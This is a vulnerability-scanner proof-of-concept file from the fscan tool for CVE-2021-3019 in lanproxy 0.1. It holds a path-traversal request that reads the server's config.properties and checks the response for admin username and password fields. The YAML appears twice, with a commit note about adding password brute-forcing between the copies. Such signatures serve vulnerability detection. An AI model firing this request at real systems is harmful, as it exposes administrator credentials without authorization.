fscan/WebScan/pocs/lanproxy-cve-2021-3019-lfi.yml

name: poc-yaml-lanproxy-cve-2021-3019-lfi
rules:
  - method: GET
    path: "/../conf/config.properties"
    expression: |
      response.status == 200 && response.body.bcontains(bytes(string(b"config.admin.username"))) && response.body.bcontains(bytes(string(b"config.admin.password"))) && response.content_type.contains("application/octet-stream")
detail:
  author: pa55w0rd(www.pa55w0rd.online/)
  Affected Version: "lanproxy 0.1"
  links:
    - https://github.com/ffay/lanproxy/issues/152
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3019
修改yaml解析模块,支持密码爆破,如tomcat弱口令。yaml中新增sets参数,类型为数组,用于存放密码,具体看tomcat-manager-week.yaml 2021-02-25 03:53:58 -08:00			`name: poc-yaml-lanproxy-cve-2021-3019-lfi`
			`rules:`
			`- method: GET`
			`path: "/../conf/config.properties"`
			`expression: \|`
			`response.status == 200 && response.body.bcontains(bytes(string(b"config.admin.username"))) && response.body.bcontains(bytes(string(b"config.admin.password"))) && response.content_type.contains("application/octet-stream")`
			`detail:`
			`author: pa55w0rd(www.pa55w0rd.online/)`
			`Affected Version: "lanproxy 0.1"`
			`links:`
			`- https://github.com/ffay/lanproxy/issues/152`
			`- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3019`